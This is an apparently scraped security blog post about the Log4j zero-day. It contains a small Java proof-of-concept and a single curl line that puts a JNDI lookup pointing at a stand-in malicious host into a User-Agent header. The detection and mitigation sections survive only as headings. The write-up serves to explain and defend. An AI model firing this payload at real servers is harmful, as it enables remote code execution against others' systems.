InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. Subscribe to our weekly newsletter for the coolest infosec updates: https://weekly.infosecwriteups.com/

Follow publication

Log4j zero-day vulnerability : Exploitation, Detection & Mitigation

Pratinav Chandra
InfoSec Write-ups
Published in
6 min readDec 15, 2021
Photo by Clint Patterson on Unsplash

Overview

What is Log4j?

Log4j Architecture

Log4j Architecture [source: https://logging.apache.org]

Exploitation

import java.util.*;
import
org.apache.logging.log4j.Logger;
import org.apache.logging.log4j.LogManager;
public class poc{
static Logger logger = LogManager.getLogger(poc.class);
public static void main(String args[]) {
System.out.println("Enter your name:");
Scanner sc = new Scanner(System.in);
String name = sc.nextLine();
logger.error(name);
System.out.println("Hi "+name);
}
}
User enters “Bob” and it simply gets logged and echoed out
Entering a lookup, replaces and logs the corresponding value
curl -H "User-Agent: ${jndi:ldap://www.malicious.com/payload}" target.com
Exploit Workflow

Impact

Detection

Mitigation

Published in InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. Subscribe to our weekly newsletter for the coolest infosec updates: https://weekly.infosecwriteups.com/

Written by Pratinav Chandra

As an engineer who loves building and breaking stuff, I share new things I learn and implement during my time working in the Cybersecurity industry!

No responses yet

Write a response